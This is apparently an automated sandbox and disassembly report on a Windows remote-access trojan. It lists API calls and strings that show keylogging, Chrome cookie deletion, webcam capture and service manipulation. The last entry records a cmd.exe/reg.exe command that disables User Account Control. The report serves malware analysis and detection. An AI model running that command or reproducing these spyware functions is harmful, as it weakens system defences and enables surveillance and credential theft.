                                                                                        • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                                                        • GetLastError.KERNEL32 ref: 0040BAE7
                                                                                        Strings
                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                                                        • UserProfile, xrefs: 0040BAAD
                                                                                        • [Chrome Cookies not found], xrefs: 0040BB01
                                                                                        • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DeleteErrorFileLast
                                                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                        • API String ID: 2018770650-304995407
                                                                                        • Opcode ID: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                                                                        • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                                                        • Opcode Fuzzy Hash: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                                                                        • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$PkGNG$mscoree.dll
                                                                                        • API String ID: 4061214504-213444651
                                                                                        • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                                        • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                                                        • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                                        • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                                                        • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                        • String ID: Alarm triggered$`#v
                                                                                        • API String ID: 614609389-3049340936
                                                                                        • Opcode ID: 2f63ca3754ee2fa8067f4581fa5685451e0165abe6878d0f9dceb9a842065b81
                                                                                        • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                                                        • Opcode Fuzzy Hash: 2f63ca3754ee2fa8067f4581fa5685451e0165abe6878d0f9dceb9a842065b81
                                                                                        • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __allrem.LIBCMT ref: 0043AC69
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                                                        • __allrem.LIBCMT ref: 0043AC9C
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                                                        • __allrem.LIBCMT ref: 0043ACD1
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                        • String ID:
                                                                                        • API String ID: 1992179935-0
                                                                                        • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                        • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                                                        • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                        • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                                                                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: H_prologSleep
                                                                                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                        • API String ID: 3469354165-3054508432
                                                                                        • Opcode ID: 2bae3fc1a4521fd6cfe0abfe2e334f7941d0747335ff3d87f549c58b7eefc5ba
                                                                                        • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                                                        • Opcode Fuzzy Hash: 2bae3fc1a4521fd6cfe0abfe2e334f7941d0747335ff3d87f549c58b7eefc5ba
                                                                                        • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __cftoe
                                                                                        • String ID:
                                                                                        • API String ID: 4189289331-0
                                                                                        • Opcode ID: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                                                                        • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                                                        • Opcode Fuzzy Hash: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                                                                        • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                        • String ID:
                                                                                        • API String ID: 493672254-0
                                                                                        • Opcode ID: 91938c1d555d364b93c99e00d8beeb13e1151d7f412d7edf767a6a0184c3eeef
                                                                                        • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                                                        • Opcode Fuzzy Hash: 91938c1d555d364b93c99e00d8beeb13e1151d7f412d7edf767a6a0184c3eeef
                                                                                        • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __alldvrm$_strrchr
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 1036877536-263838557
                                                                                        • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                                                        • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                                                        • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                                                        • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                        • _free.LIBCMT ref: 0044824C
                                                                                        • _free.LIBCMT ref: 00448274
                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                        • _abort.LIBCMT ref: 00448293
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 3160817290-0
                                                                                        • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                                        • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                                                        • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                                        • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                        • String ID:
                                                                                        • API String ID: 221034970-0
                                                                                        • Opcode ID: 966b63bd912de40b5b615a00da15e5d8939a9a4c78db0212e4922df61029cb32
                                                                                        • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                                                        • Opcode Fuzzy Hash: 966b63bd912de40b5b615a00da15e5d8939a9a4c78db0212e4922df61029cb32
                                                                                        • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                        • String ID:
                                                                                        • API String ID: 221034970-0
                                                                                        • Opcode ID: 881ec567a8ecab9b5ae46dea35bb7569396cf57d6f42af84948da6ead9762d9b
                                                                                        • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                                                        • Opcode Fuzzy Hash: 881ec567a8ecab9b5ae46dea35bb7569396cf57d6f42af84948da6ead9762d9b
                                                                                        • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                        • String ID:
                                                                                        • API String ID: 221034970-0
                                                                                        • Opcode ID: 88b0ec0b9de38ee72874faffadaad7a58cf941c8d18bd5a35ca229f780ffab3e
                                                                                        • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                                                        • Opcode Fuzzy Hash: 88b0ec0b9de38ee72874faffadaad7a58cf941c8d18bd5a35ca229f780ffab3e
                                                                                        • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 0-263838557
                                                                                        • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                        • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                                                        • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                        • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404DD2
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 3360349984-263838557
                                                                                        • Opcode ID: da9b55f167a3d17e97016713e4b8b3caaa4e9716ac3efc00888ec9c07983d3ee
                                                                                        • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                                                        • Opcode Fuzzy Hash: da9b55f167a3d17e97016713e4b8b3caaa4e9716ac3efc00888ec9c07983d3ee
                                                                                        • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                                                                        • wsprintfW.USER32 ref: 0040B1F3
                                                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EventLocalTimewsprintf
                                                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                        • API String ID: 1497725170-248792730
                                                                                        • Opcode ID: 8041cec816ab2e246b71a5493a2e7e61b0e1b04a10b028702d09a00a2ad25ebb
                                                                                        • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                                                        • Opcode Fuzzy Hash: 8041cec816ab2e246b71a5493a2e7e61b0e1b04a10b028702d09a00a2ad25ebb
                                                                                        • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                                        • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                                                        • String ID: XQG
                                                                                        • API String ID: 1958988193-3606453820
                                                                                        • Opcode ID: 205b82dffe9b0f77f7c93e78d4092e9a7ef319f9f0d3ec4eb64b3aa0a1bff41f
                                                                                        • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                                                        • Opcode Fuzzy Hash: 205b82dffe9b0f77f7c93e78d4092e9a7ef319f9f0d3ec4eb64b3aa0a1bff41f
                                                                                        • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                                        • GetLastError.KERNEL32 ref: 0041D580
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                                                        • String ID: 0$MsgWindowClass
                                                                                        • API String ID: 2877667751-2410386613
                                                                                        • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                                        • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                                                        • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                                        • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                                                        • CloseHandle.KERNEL32(?), ref: 004077AA
                                                                                        • CloseHandle.KERNEL32(?), ref: 004077AF
                                                                                        Strings
